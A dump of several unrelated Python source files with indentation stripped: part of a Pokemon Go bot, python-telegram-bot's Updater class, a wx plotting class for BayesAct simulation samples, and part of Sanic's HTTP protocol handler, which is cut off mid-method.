"[-]?\d{1,3}[.]\d{3,7}", location_name
)
if len(possible_coordinates) == 2:
# 2 matches, this must be a coordinate. We'll bypass the Google
# geocode so we keep the exact location.
self.logger.info(
'[x] Coordinates found in passed in location, '
'not geocoding.'
)
return float(possible_coordinates[0]), float(possible_coordinates[1]), float("0.0")
geolocator = GoogleV3(api_key=self.config.gmapkey)
loc = geolocator.geocode(location_name, timeout=10)
return float(loc.latitude), float(loc.longitude), float(loc.altitude)
def heartbeat(self):
# Remove forts that we can now spin again.
self.fort_timeouts = {id: timeout for id, timeout
in self.fort_timeouts.iteritems()
if timeout >= time.time() * 1000}
request = self.api.create_request()
request.get_player()
request.check_awarded_badges()
request.call()
try:
self.web_update_queue.put_nowait(True) # do this outside of thread every tick
except Queue.Full:
pass
def update_web_location_worker(self):
pass
# while True:
# self.web_update_queue.get()
# self.update_web_location()
def get_inventory_count(self, what):
response_dict = self.get_inventory()
inventory_items = response_dict.get('responses', {}).get('GET_INVENTORY', {}).get(
'inventory_delta', {}).get('inventory_items', {})
if inventory_items:
pokecount = 0
itemcount = 1
for item in inventory_items:
if 'inventory_item_data' in item:
if 'pokemon_data' in item['inventory_item_data']:
pokecount += 1
itemcount += item['inventory_item_data'].get('item', {}).get('count', 0)
if 'pokemon' in what:
return pokecount
if 'item' in what:
return itemcount
return '0'
def get_player_info(self):
response_dict = self.get_inventory()
inventory_items = response_dict.get('responses', {}).get('GET_INVENTORY', {}).get(
'inventory_delta', {}).get('inventory_items', {})
if inventory_items:
pokecount = 0
itemcount = 1
for item in inventory_items:
# print('item {}'.format(item))
playerdata = item.get('inventory_item_data', {}).get('player_stats')
if playerdata:
nextlvlxp = (int(playerdata.get('next_level_xp', 0)) - int(playerdata.get('experience', 0)))
if 'level' in playerdata and 'experience' in playerdata:
self.logger.info(
'Level: {level}'.format(
**playerdata) +
' (Next Level: {} XP)'.format(
nextlvlxp) +
' (Total: {experience} XP)'
''.format(**playerdata))
if 'pokemons_captured' in playerdata and 'poke_stop_visits' in playerdata:
self.logger.info(
'Pokemon Captured: '
'{pokemons_captured}'.format(
**playerdata) +
' | Pokestops Visited: '
'{poke_stop_visits}'.format(
**playerdata))
def has_space_for_loot(self):
number_of_things_gained_by_stop = 5
enough_space = (
self.get_inventory_count('item') <
self._player['max_item_storage'] - number_of_things_gained_by_stop
)
return enough_space
def get_forts(self, order_by_distance=False):
forts = [fort
for fort in self.cell['forts']
if 'latitude' in fort and 'type' in fort]
if order_by_distance:
forts.sort(key=lambda x: distance(
self.position[0],
self.position[1],
x['latitude'],
x['longitude']
))
return forts
def get_map_objects(self, lat, lng, timestamp, cellid):
if time.time() - self.last_time_map_object < self.config.map_object_cache_time:
return self.last_map_object
self.last_map_object = self.api.get_map_objects(
latitude=f2i(lat),
longitude=f2i(lng),
since_timestamp_ms=timestamp,
cell_id=cellid
)
self.last_time_map_object = time.time()
return self.last_map_object
|
updater.py | #!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains the class Updater, which tries to make creating Telegram bots intuitive."""
import logging
import os
import ssl
import warnings
from threading import Thread, Lock, current_thread, Event
from time import sleep
import subprocess
from signal import signal, SIGINT, SIGTERM, SIGABRT
from queue import Queue
from telegram import Bot, TelegramError
from telegram.ext import Dispatcher, JobQueue
from telegram.error import Unauthorized, InvalidToken, RetryAfter
from telegram.utils.request import Request
from telegram.utils.webhookhandler import (WebhookServer, WebhookHandler)
logging.getLogger(__name__).addHandler(logging.NullHandler())
class Updater(object):
"""
This class, which employs the :class:`telegram.ext.Dispatcher`, provides a frontend to
:class:`telegram.Bot` to the programmer, so they can focus on coding the bot. Its purpose is to
receive the updates from Telegram and to deliver them to said dispatcher. It also runs in a
separate thread, so the user can interact with the bot, for example on the command line. The
dispatcher supports handlers for different kinds of data: Updates from Telegram, basic text
commands and even arbitrary types. The updater can be started as a polling service or, for
production, use a webhook to receive updates. This is achieved using the WebhookServer and
WebhookHandler classes.
Attributes:
bot (:class:`telegram.Bot`): The bot used with this Updater.
user_sig_handler (:obj:`signal`): signals the updater will respond to.
update_queue (:obj:`Queue`): Queue for the updates.
job_queue (:class:`telegram.ext.JobQueue`): Jobqueue for the updater.
dispatcher (:class:`telegram.ext.Dispatcher`): Dispatcher that handles the updates and
dispatches them to the handlers.
running (:obj:`bool`): Indicates if the updater is running.
Args:
token (:obj:`str`, optional): The bot's token given by the @BotFather.
base_url (:obj:`str`, optional): Base_url for the bot.
workers (:obj:`int`, optional): Amount of threads in the thread pool for functions
decorated with ``@run_async``.
bot (:class:`telegram.Bot`, optional): A pre-initialized bot instance. If a pre-initialized
bot is used, it is the user's responsibility to create it using a `Request`
instance with a large enough connection pool.
user_sig_handler (:obj:`function`, optional): Takes ``signum, frame`` as positional
arguments. This will be called when a signal is received, defaults are (SIGINT,
SIGTERM, SIGABRT) setable with :attr:`idle`.
request_kwargs (:obj:`dict`, optional): Keyword args to control the creation of a request
object (ignored if `bot` argument is used).
Note:
You must supply either a :attr:`bot` or a :attr:`token` argument.
Raises:
ValueError: If both :attr:`token` and :attr:`bot` are passed or none of them.
"""
_request = None
def __init__(self,
token=None,
base_url=None,
workers=4,
bot=None,
user_sig_handler=None,
request_kwargs=None):
if (token is None) and (bot is None):
raise ValueError('`token` or `bot` must be passed')
if (token is not None) and (bot is not None):
raise ValueError('`token` and `bot` are mutually exclusive')
self.logger = logging.getLogger(__name__)
con_pool_size = workers + 4
if bot is not None:
self.bot = bot
if bot.request.con_pool_size < con_pool_size:
self.logger.warning(
'Connection pool of Request object is smaller than optimal value (%s)',
con_pool_size)
else:
# we need a connection pool the size of:
# * for each of the workers
# * 1 for Dispatcher
# * 1 for polling Updater (even if webhook is used, we can spare a connection)
# * 1 for JobQueue
# * 1 for main thread
if request_kwargs is None:
request_kwargs = {}
if 'con_pool_size' not in request_kwargs:
request_kwargs['con_pool_size'] = con_pool_size
self._request = Request(**request_kwargs)
self.bot = Bot(token, base_url, request=self._request)
self.user_sig_handler = user_sig_handler
self.update_queue = Queue()
self.job_queue = JobQueue(self.bot)
self.__exception_event = Event()
self.dispatcher = Dispatcher(
self.bot,
self.update_queue,
job_queue=self.job_queue,
workers=workers,
exception_event=self.__exception_event)
self.last_update_id = 0
self.running = False
self.is_idle = False
self.httpd = None
self.__lock = Lock()
self.__threads = []
def _init_thread(self, target, name, *args, **kwargs):
thr = Thread(target=self._thread_wrapper, name=name, args=(target,) + args, kwargs=kwargs)
thr.start()
self.__threads.append(thr)
def _thread_wrapper(self, target, *args, **kwargs):
thr_name = current_thread().name
self.logger.debug('{0} - started'.format(thr_name))
try:
target(*args, **kwargs)
except Exception:
self.__exception_event.set()
self.logger.exception('unhandled exception')
raise
self.logger.debug('{0} - ended'.format(thr_name))
def start_polling(self,
poll_interval=0.0,
timeout=10,
network_delay=None,
clean=False,
bootstrap_retries=0,
read_latency=2.,
allowed_updates=None):
"""Starts polling updates from Telegram.
Args:
poll_interval (:obj:`float`, optional): Time to wait between polling updates from
Telegram in seconds. Default is 0.0.
timeout (:obj:`float`, optional): Passed to :attr:`telegram.Bot.get_updates`.
clean (:obj:`bool`, optional): Whether to clean any pending updates on Telegram servers
before actually starting to poll. Default is False.
bootstrap_retries (:obj:`int`, optional): Whether the bootstrapping phase of the
`Updater` will retry on failures on the Telegram server.
* < 0 - retry indefinitely
* 0 - no retries (default)
* > 0 - retry up to X times
allowed_updates (List[:obj:`str`], optional): Passed to
:attr:`telegram.Bot.get_updates`.
read_latency (:obj:`float` | :obj:`int`, optional): Grace time in seconds for receiving
the reply from server. Will be added to the `timeout` value and used as the read
timeout from server (Default: 2).
network_delay: Deprecated. Will be honoured as :attr:`read_latency` for a while but
will be removed in the future.
Returns:
:obj:`Queue`: The update queue that can be filled from the main thread.
"""
if network_delay is not None:
warnings.warn('network_delay is deprecated, use read_latency instead')
read_latency = network_delay
with self.__lock:
if not self.running:
self.running = True
# Create & start threads
self.job_queue.start()
self._init_thread(self.dispatcher.start, "dispatcher")
self._init_thread(self._start_polling, "updater", poll_interval, timeout,
read_latency, bootstrap_retries, clean, allowed_updates)
# Return the update queue so the main thread can insert updates
return self.update_queue
def start_webhook(self,
listen='127.0.0.1',
port=80,
url_path='',
cert=None,
key=None,
clean=False,
bootstrap_retries=0,
webhook_url=None,
allowed_updates=None):
"""
Starts a small http server to listen for updates via webhook. If cert
and key are not provided, the webhook will be started directly on
http://listen:port/url_path, so SSL can be handled by another
application. Else, the webhook will be started on
https://listen:port/url_path
Args:
listen (:obj:`str`, optional): IP-Address to listen on. Default ``127.0.0.1``.
port (:obj:`int`, optional): Port the bot should be listening on. Default ``80``.
url_path (:obj:`str`, optional): Path inside url.
cert (:obj:`str`, optional): Path to the SSL certificate file.
key (:obj:`str`, optional): Path to the SSL key file.
clean (:obj:`bool`, optional): Whether to clean any pending updates on Telegram servers
before actually starting the webhook. Default is ``False``.
bootstrap_retries (:obj:`int`, optional): Whether the bootstrapping phase of the
`Updater` will retry on failures on the Telegram server.
* < 0 - retry indefinitely
* 0 - no retries (default)
* > 0 - retry up to X times
webhook_url (:obj:`str`, optional): Explicitly specify the webhook url. Useful behind
NAT, reverse proxy, etc. Default is derived from `listen`, `port` & `url_path`.
allowed_updates (List[:obj:`str`], optional): Passed to
:attr:`telegram.Bot.set_webhook`.
Returns:
:obj:`Queue`: The update queue that can be filled from the main thread.
"""
with self.__lock:
if not self.running:
self.running = True
# Create & start threads
self.job_queue.start()
self._init_thread(self.dispatcher.start, "dispatcher"),
self._init_thread(self._start_webhook, "updater", listen, port, url_path, cert,
key, bootstrap_retries, clean, webhook_url, allowed_updates)
# Return the update queue so the main thread can insert updates
return self.update_queue
def _start_polling(self, poll_interval, timeout, read_latency, bootstrap_retries, clean,
allowed_updates):
# """
# Thread target of thread 'updater'. Runs in background, pulls
# updates from Telegram and inserts them in the update queue of the
# Dispatcher.
# """
cur_interval = poll_interval
self.logger.debug('Updater thread started')
self._bootstrap(bootstrap_retries, clean=clean, webhook_url='', allowed_updates=None)
while self.running:
try:
updates = self.bot.get_updates(
self.last_update_id,
timeout=timeout,
read_latency=read_latency,
allowed_updates=allowed_updates)
except RetryAfter as e:
self.logger.info(str(e))
cur_interval = 0.5 + e.retry_after
except TelegramError as te:
self.logger.error("Error while getting Updates: {0}".format(te))
# Put the error into the update queue and let the Dispatcher
# broadcast it
self.update_queue.put(te)
cur_interval = self._increase_poll_interval(cur_interval)
else:
if not self.running:
if len(updates) > 0:
self.logger.debug('Updates ignored and will be pulled '
'again on restart.')
break
if updates:
for update in updates:
self.update_queue.put(update)
self.last_update_id = updates[-1].update_id + 1
cur_interval = poll_interval
sleep(cur_interval)
@staticmethod
def _increase_poll_interval(current_interval):
# increase waiting times on subsequent errors up to 30secs
if current_interval == 0:
current_interval = 1
elif current_interval < 30:
current_interval += current_interval / 2
elif current_interval > 30:
current_interval = 30
return current_interval
def _start_webhook(self, listen, port, url_path, cert, key, bootstrap_retries, clean,
webhook_url, allowed_updates):
self.logger.debug('Updater thread started')
use_ssl = cert is not None and key is not None
if not url_path.startswith('/'):
url_path = '/{0}'.format(url_path)
# Create and start server
self.httpd = WebhookServer((listen, port), WebhookHandler, self.update_queue, url_path,
self.bot)
if use_ssl:
self._check_ssl_cert(cert, key)
# DO NOT CHANGE: Only set webhook if SSL is handled by library
if not webhook_url:
webhook_url = self._gen_webhook_url(listen, port, url_path)
self._bootstrap(
max_retries=bootstrap_retries,
clean=clean,
webhook_url=webhook_url,
cert=open(cert, 'rb'),
allowed_updates=allowed_updates)
elif clean:
self.logger.warning("cleaning updates is not supported if "
"SSL-termination happens elsewhere; skipping")
self.httpd.serve_forever(poll_interval=1)
def _check_ssl_cert(self, cert, key):
# Check SSL-Certificate with openssl, if possible
try:
exit_code = subprocess.call(
["openssl", "x509", "-text", "-noout", "-in", cert],
stdout=open(os.devnull, 'wb'),
stderr=subprocess.STDOUT)
except OSError:
exit_code = 0
if exit_code is 0:
try:
self.httpd.socket = ssl.wrap_socket(
self.httpd.socket, certfile=cert, keyfile=key, server_side=True)
except ssl.SSLError as error:
self.logger.exception('Failed to init SSL socket')
raise TelegramError(str(error))
else:
raise TelegramError('SSL Certificate invalid')
@staticmethod
def _gen_webhook_url(listen, port, url_path):
return 'https://{listen}:{port}{path}'.format(listen=listen, port=port, path=url_path)
def _bootstrap(self, max_retries, clean, webhook_url, allowed_updates, cert=None):
retries = 0
while 1:
try:
if clean:
# Disable webhook for cleaning
self.bot.delete_webhook()
self._clean_updates()
sleep(1)
self.bot.set_webhook(
url=webhook_url, certificate=cert, allowed_updates=allowed_updates)
except (Unauthorized, InvalidToken):
raise
except TelegramError:
msg = 'error in bootstrap phase; try={0} max_retries={1}'.format(retries,
max_retries)
if max_retries < 0 or retries < max_retries:
self.logger.warning(msg)
retries += 1
else:
self.logger.exception(msg)
raise
else:
break
sleep(1)
def _clean_updates(self):
self.logger.debug('Cleaning updates from Telegram server')
updates = self.bot.get_updates()
while updates:
updates = self.bot.get_updates(updates[-1].update_id + 1)
def stop(self):
"""Stops the polling/webhook thread, the dispatcher and the job queue."""
self.job_queue.stop()
with self.__lock:
if self.running or self.dispatcher.has_running_threads:
self.logger.debug('Stopping Updater and Dispatcher...')
self.running = False
self._stop_httpd()
self._stop_dispatcher()
self._join_threads()
# Stop the Request instance only if it was created by the Updater
if self._request:
self._request.stop()
def _stop_httpd(self):
if self.httpd:
self.logger.debug('Waiting for current webhook connection to be '
'closed... Send a Telegram message to the bot to exit '
'immediately.')
self.httpd.shutdown()
self.httpd = None
def _stop_dispatcher(self):
self.logger.debug('Requesting Dispatcher to stop...')
self.dispatcher.stop()
def _join_threads(self):
for thr in self.__threads:
self.logger.debug('Waiting for {0} thread to end'.format(thr.name))
thr.join()
self.logger.debug('{0} thread has ended'.format(thr.name))
self.__threads = []
def signal_handler(self, signum, frame):
self.is_idle = False
if self.running:
self.stop()
if self.user_sig_handler:
self.user_sig_handler(signum, frame)
else:
self.logger.warning('Exiting immediately!')
import os
os._exit(1)
def idle(self, stop_signals=(SIGINT, SIGTERM, SIGABRT)):
"""Blocks until one of the signals are received and stops the updater.
Args:
stop_signals (:obj:`iterable`): Iterable containing signals from the signal module that
should be subscribed to. Updater.stop() will be called on receiving one of those
signals. Defaults to (``SIGINT``, ``SIGTERM``, ``SIGABRT``).
"""
for sig in stop_signals:
signal(sig, self.signal_handler)
self.is_idle = True
while self.is_idle:
sleep(1)
|
cPlotBayesactSim.py | # Plots bayesactsim by parsing it
import subprocess
import os
import re
import time
import signal
import threading
import wx
from cBayesactSimBuffer import cBayesactSimBuffer
from cEnum import eAxes, eTurn, eEPA
from cConstants import cPlotConstants, cEPAConstants
class cPlotBayesactSim(object):
# The axis items are enumerations of the EPA
def __init__(self, iPlotEPAPanel):
self.m_PlotEPAPanels = [iPlotEPAPanel]
self.m_KeepAlive = True
self.m_Lock = threading.Lock()
self.m_LearnerFundamentalSamples = []
self.m_SimulatorFundamentalSamples = []
self.m_LearnerTauSamples = []
self.m_SimulatorTauSamples = []
self.m_LearnerPreviousAction = []
self.m_SimulatorPreviousAction = []
self.m_Sleep = False
self.m_Parser = None
self.m_ParserThread = None
def plotBayesactSim(self):
if ((None == self.m_LearnerFundamentalSamples) and (None == self.m_LearnerTauSamples)):
return
# To plot only a certain number of samples
# Remember that this is a transpose of the samples, so the length of the learn/simul samples array is 9, the 3 pairs of epa
for i in range(len(self.m_LearnerFundamentalSamples)):
self.m_LearnerFundamentalSamples[i] = self.m_LearnerFundamentalSamples[i][:cPlotConstants.m_MaxPlotSamples]
for i in range(len(self.m_SimulatorFundamentalSamples)):
self.m_SimulatorFundamentalSamples[i] = self.m_SimulatorFundamentalSamples[i][:cPlotConstants.m_MaxPlotSamples]
for i in range(len(self.m_LearnerTauSamples)):
self.m_LearnerTauSamples[i] = self.m_LearnerTauSamples[i][:cPlotConstants.m_MaxPlotSamples]
for i in range(len(self.m_SimulatorTauSamples)):
self.m_SimulatorTauSamples[i] = self.m_SimulatorTauSamples[i][:cPlotConstants.m_MaxPlotSamples]
for plotPanel in self.m_PlotEPAPanels:
#with plotPanel.m_Lock
if (eEPA.fundamental == plotPanel.m_PlotType):
plotPanel.plotEPA(self.m_LearnerFundamentalSamples, self.m_SimulatorFundamentalSamples, self.m_LearnerPreviousAction, self.m_SimulatorPreviousAction)
else:
plotPanel.plotEPA(self.m_LearnerTauSamples, self.m_SimulatorTauSamples, self.m_LearnerPreviousAction, self.m_SimulatorPreviousAction)
# Resplots and assumes the samples were already truncated to the max plot samples from the above function
def replotOnPanel(self, iPlotEPAPanel):
if (eEPA.fundamental == iPlotEPAPanel.m_PlotType):
iPlotEPAPanel.plotEPA(self.m_LearnerFundamentalSamples, self.m_SimulatorFundamentalSamples, self.m_LearnerPreviousAction, self.m_SimulatorPreviousAction)
else:
iPlotEPAPanel.plotEPA(self.m_LearnerTauSamples, self.m_SimulatorTauSamples, self.m_LearnerPreviousAction, self.m_SimulatorPreviousAction)
def sleepProcess(self):
self.m_Sleep = True
self.m_Parser.sleepProcess()
def continueProcess(self):
self.m_Sleep = False
self.m_Parser.continueProcess()
def killProcess(self):
self.sleepProcess()
self.m_Parser.m_KeepAlive = False
def bufferData(self):
self.m_Parser = cBayesactSimBuffer()
self.m_ParserThread = threading.Thread(target=self.m_Parser.run)
self.m_ParserThread.daemon=True
self.m_ParserThread.start()
while(self.m_Parser.m_BufferThreshold < len(self.m_Parser.m_SamplesBuffer)):
print self.m_Parser.m_BufferThreshold
def plotBufferedData(self):
while(0 < len(self.m_Parser.m_SamplesBuffer)):
self.plotBayesactSim()
print self.m_Parser.m_BufferThreshold
def plotFile(self, iFileName):
self.m_Parser = cBayesactSimBuffer()
self.m_Parser.parseFile(iFileName)
self.plotBufferedData()
def clearPlots(self):
for panel in self.m_PlotEPAPanels:
panel.clearAxes()
panel.redrawAxes()
def runOnPlot(self):
# It is possible that you may preload data for the plot in the buffer
# and then assign this plotter to a plot
# This statement here prevents it though
if (None == self.m_PlotEPAPanels[0]):
# Thread ends
return
self.m_Parser = cBayesactSimBuffer()
self.m_ParserThread = threading.Thread(target=self.m_Parser.run, kwargs={"iFileName" : None})
self.m_ParserThread.daemon=True
self.m_ParserThread.start()
while(self.m_KeepAlive):
while (not(self.m_Sleep)):
fundamantals = self.m_Parser.getSamples()
self.setSamples(fundamantals[eTurn.learner], fundamantals[eTurn.simulator])
self.plotBayesactSim()
self.killProcess()
#self.m_ParserThread.join()
def setFundamentals(self, iLearnerFundamentalSamples, iSimulatorFundamentalSamples):
self.m_LearnerFundamentalSamples = iLearnerFundamentalSamples
self.m_SimulatorFundamentalSamples = iSimulatorFundamentalSamples
def setTau(self, iLearnerTauSamples, iSimulatorTauSamples):
self.m_LearnerTauSamples = iLearnerTauSamples
self.m_SimulatorTauSamples = iSimulatorTauSamples
|
server.py | import asyncio
import multiprocessing
import os
import sys
import traceback
from collections import deque
from functools import partial
from inspect import isawaitable
from signal import SIG_IGN, SIGINT, SIGTERM, Signals
from signal import signal as signal_func
from socket import SO_REUSEADDR, SOL_SOCKET, socket
from time import time
from httptools import HttpRequestParser # type: ignore
from httptools.parser.errors import HttpParserError # type: ignore
from sanic.compat import Header, ctrlc_workaround_for_windows
from sanic.exceptions import (
HeaderExpectationFailed,
InvalidUsage,
PayloadTooLarge,
RequestTimeout,
ServerError,
ServiceUnavailable,
)
from sanic.log import access_logger, logger
from sanic.request import EXPECT_HEADER, Request, StreamBuffer
from sanic.response import HTTPResponse
try:
import uvloop # type: ignore
if not isinstance(asyncio.get_event_loop_policy(), uvloop.EventLoopPolicy):
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
pass
OS_IS_WINDOWS = os.name == "nt"
class Signal:
stopped = False
class HttpProtocol(asyncio.Protocol):
"""
This class provides a basic HTTP implementation of the sanic framework.
"""
__slots__ = (
# app
"app",
# event loop, connection
"loop",
"transport",
"connections",
"signal",
# request params
"parser",
"request",
"url",
"headers",
# request config
"request_handler",
"request_timeout",
"response_timeout",
"keep_alive_timeout",
"request_max_size",
"request_buffer_queue_size",
"request_class",
"is_request_stream",
"error_handler",
# enable or disable access log purpose
"access_log",
# connection management
"_total_request_size",
"_request_timeout_handler",
"_response_timeout_handler",
"_keep_alive_timeout_handler",
"_last_request_time",
"_last_response_time",
"_is_stream_handler",
"_not_paused",
"_request_handler_task",
"_request_stream_task",
"_keep_alive",
"_header_fragment",
"state",
"_body_chunks",
)
def __init__(
self,
*,
loop,
app,
signal=Signal(),
connections=None,
state=None,
**kwargs,
):
asyncio.set_event_loop(loop)
self.loop = loop
deprecated_loop = self.loop if sys.version_info < (3, 7) else None
self.app = app
self.transport = None
self.request = None
self.parser = None
self.url = None
self.headers = None
self.signal = signal
self.access_log = self.app.config.ACCESS_LOG
self.connections = connections if connections is not None else set()
self.request_handler = self.app.handle_request
self.error_handler = self.app.error_handler
self.request_timeout = self.app.config.REQUEST_TIMEOUT
self.request_buffer_queue_size = (
self.app.config.REQUEST_BUFFER_QUEUE_SIZE
)
self.response_timeout = self.app.config.RESPONSE_TIMEOUT
self.keep_alive_timeout = self.app.config.KEEP_ALIVE_TIMEOUT
self.request_max_size = self.app.config.REQUEST_MAX_SIZE
self.request_class = self.app.request_class or Request
self.is_request_stream = self.app.is_request_stream
self._is_stream_handler = False
self._not_paused = asyncio.Event(loop=deprecated_loop)
self._total_request_size = 0
self._request_timeout_handler = None
self._response_timeout_handler = None
self._keep_alive_timeout_handler = None
self._last_request_time = None
self._last_response_time = None
self._request_handler_task = None
self._request_stream_task = None
self._keep_alive = self.app.config.KEEP_ALIVE
self._header_fragment = b""
self.state = state if state else {}
if "requests_count" not in self.state:
self.state["requests_count"] = 0
self._not_paused.set()
self._body_chunks = deque()
@property
def keep_alive(self):
"""
Check if the connection needs to be kept alive based on the params
attached to the `_keep_alive` attribute, :attr:`Signal.stopped`
and :func:`HttpProtocol.parser.should_keep_alive`
:return: ``True`` if connection is to be kept alive ``False`` else
"""
return (
self._keep_alive
and not self.signal.stopped
and self.parser.should_keep_alive()
)
# -------------------------------------------- #
# Connection
# -------------------------------------------- #
def connection_made(self, transport):
self.connections.add(self)
self._request_timeout_handler = self.loop.call_later(
self.request_timeout, self.request_timeout_callback
)
self.transport = transport
self._last_request_time = time()
def connection_lost(self, exc):
self.connections.discard(self)
if self._request_handler_task:
self._request_handler_task.cancel()
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
def pause_writing(self):
self._not_paused.clear()
def resume_writing(self):
self._not_paused.set()
def request_timeout_callback(self):
# See the docstring in the RequestTimeout exception, to see
# exactly what this timeout is checking for.
# Check if elapsed time since request initiated exceeds our
# configured maximum request timeout value
time_elapsed = time() - self._last_request_time
if time_elapsed < self.request_timeout:
time_left = self.request_timeout - time_elapsed
self._request_timeout_handler = self.loop.call_later(
time_left, self.request_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(RequestTimeout("Request Timeout"))
def response_timeout_callback(self):
# Check if elapsed time since response was initiated exceeds our
# configured maximum request timeout value
time_elapsed = time() - self._last_request_time
if time_elapsed < self.response_timeout:
time_left = self.response_timeout - time_elapsed
self._response_timeout_handler = self.loop.call_later(
time_left, self.response_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(ServiceUnavailable("Response Timeout"))
def keep_alive_timeout_callback(self):
"""
Check if elapsed time since last response exceeds our configured
maximum keep alive timeout value and if so, close the transport
pipe and let the response writer handle the error.
:return: None
"""
time_elapsed = time() - self._last_response_time
if time_elapsed < self.keep_alive_timeout:
time_left = self.keep_alive_timeout - time_elapsed
self._keep_alive_timeout_handler = self.loop.call_later(
time_left, self.keep_alive_timeout_callback
)
else:
logger.debug("KeepAlive Timeout. Closing connection.")
self.transport.close()
self.transport = None
# -------------------------------------------- #
# Parsing
# -------------------------------------------- #
def data_received(self, data):
# Check for the request itself getting too large and exceeding
# memory limits
self._total_request_size += len(data)
if self._total_request_size > self.request_max_size:
self.write_error(PayloadTooLarge("Payload Too Large"))
# Create parser if this is the first time we're receiving data
if self.parser is None:
assert self.request is None
self.headers = []
self.parser = HttpRequestParser(self)
# requests count
self.state["requests_count"] = self.state["requests_count"] + 1
# Parse request chunk or close connection
try:
self.parser.feed_data(data)
except HttpParserError:
message = "Bad Request"
if self.app.debug:
message += "\n" + traceback.format_exc()
self.write_error(InvalidUsage(message))
def on_url(self, url):
if not self.url:
self.url = url
else:
self.url += url
def on_header(self, name, value):
self._header_fragment += name
if value is not None:
if (
self._header_fragment == b"Content-Length"
and int(value) > self.request_max_size
):
self.write_error(PayloadTooLarge("Payload Too Large"))
try:
value = value.decode()
except UnicodeDecodeError:
value = value.decode("latin_1")
self.headers.append(
(self._header_fragment.decode().casefold(), value)
)
self._header_fragment = b""
def on_headers_complete(self):
self.request = self.request_class(
url_bytes=self.url,
headers=Header(self.headers),
version=self.parser.get_http_version(),
method=self.parser.get_method().decode(),
transport=self.transport,
app=self.app,
)
# Remove any existing KeepAlive handler here,
# It will be recreated if required on the new request.
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
self._keep_alive_timeout_handler = None
if self.request.headers.get(EXPECT_HEADER):
self.expect_handler()
if self.is_request_stream:
self._is_stream_handler = self.app.router.is_stream_handler(
self.request
)
if self._is_stream_handler:
self.request.stream = StreamBuffer(
self.request_buffer_queue_size
)
self.execute_request_handler()
def expect_handler(self):
"""
Handler for Expect Header.
"""
expect = self.request.headers.get(EXPECT_HEADER)
if self.request.version == "1.1":
if expect.lower() == "100-continue":
self.transport.write(b"HTTP/1.1 100 Continue\r\n\r\n")
else:
self.write_error(
HeaderExpectationFailed(f"Unknown Expect: {expect}")
)
def on_body(self, body):
if self.is_request_stream and self._is_stream_handler:
# body chunks can be put into asyncio.Queue out of order if
# multiple tasks put concurrently and the queue is full in python
# 3.7. so we should not create more than one task putting into the
# queue simultaneously.
self._body_chunks.append(body)
if (
not self._request_stream_task
or self._request_stream_task.done()
):
self._request_stream_task = self.loop.create_task(
self.stream_append()
)
else:
self.request.body_push(body)
async def body_append(self, body):
if (
self.request is None
or self._request_stream_task is None
or self._request_stream_task.cancelled()
):
return
if self.request.stream.is_full():
self.transport.pause_reading()
await self.request.stream.put(body)
self.transport.resume_reading()
else:
await self.request.stream.put(body)
async def stream_append(self):
while self._body_chunks:
body = self._body_chunks.popleft()
if self.request.stream.is_full():
self.transport.pause_reading()
await self.request.stream.put(body)
self.transport.resume_reading()
else:
await self.request.stream.put(body)
def on_message_complete(self):
# Entire request (headers and whole body) is received.
# We can cancel and remove the request timeout handler now.
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
self._request_timeout_handler = None
if self.is_request_stream and self._is_stream_handler:
self._body_chunks.append(None)
if (
not self._request_stream_task
or self._request_stream_task.done()
):
self._request_stream_task = self.loop.create_task(
self.stream_append()
)
return
self.request.body_finish()
self.execute_request_handler()
def execute_request_handler(self):
"""
Invoke the request handler defined by the
:func:`sanic.app.Sanic.handle_request` method
:return: None
"""
self._response_timeout_handler = self.loop.call_later(
self.response_timeout, self.response_timeout_callback
)
self._last_request_time = time()
self._request_handler_task = self.loop.create_task(
self.request_handler(
self.request, self.write_response, self.stream_response
)
)
# -------------------------------------------- #
# Responding
# -------------------------------------------- #
def log_response(self, response):
"""
Helper method provided to enable the logging of responses in case if
the :attr:`HttpProtocol.access_log` is enabled.
:param response: Response generated for the current request
:type response: :class:`sanic.response.HTTPResponse` or
:class:`sanic.response.StreamingHTTPResponse`
:return: None
"""
if self.access_log:
extra = {"status": getattr(response, "status", 0)}
if isinstance(response, HTTPResponse):
extra["byte"] = len(response.body)
else:
extra["byte"] = -1
extra["host"] = "UNKNOWN"
if self.request is not None:
if self.request.ip:
extra["host"] = f"{self.request.ip}:{self.request.port}"
extra["request"] = f"{self.request.method} {self.request.url}"
else:
extra["request"] = "nil"
access_logger.info("", extra=extra)
def write_response(self, response):
"""
Writes response content synchronously to the transport.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
self.transport.write(
response.output(
self.request.version, keep_alive, self.keep_alive_timeout
)
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self.app.debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(f"Writing response failed, connection closed {e!r}")
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = time()
self.cleanup()
async def drain(self):
await self._not_paused.wait()
async def push_data(self, data):
self.transport.write(data)
async def stream_response(self, response):
"""
